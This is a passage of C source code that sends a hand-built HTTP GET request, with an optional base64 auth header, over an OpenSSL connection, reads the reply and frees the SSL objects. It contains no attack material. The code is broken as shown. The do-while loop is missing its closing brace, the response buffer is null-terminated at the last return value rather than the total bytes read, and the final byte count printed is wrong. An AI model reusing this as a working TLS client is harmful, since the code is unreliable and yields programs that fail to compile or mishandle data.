"Accept-Encoding: gzip, deflate, sdch\r\n"
"Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2\r\n"
"\r\n"
,SERVERIP, SERVERPORT
#ifdef AUTH
,b64text
#endif
);
printd("http get str: ->%s<- len:%ld\n", http_get_str, strlen(http_get_str));
err = SSL_write (ssl, http_get_str, strlen(http_get_str)); CHK_SSL(err);
err = 0;
int c1=0;
do{
err = SSL_read (ssl, buf+c1, sizeof(buf) - c1 - 1); CHK_SSL(err);
c1 += err;
while(err>0);
buf[err] = '\0';
printd ("Got %d chars:'%s'\n", err, buf);
SSL_shutdown (ssl); /* send SSL/TLS close_notify */
/* Clean up. */
close (sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
}
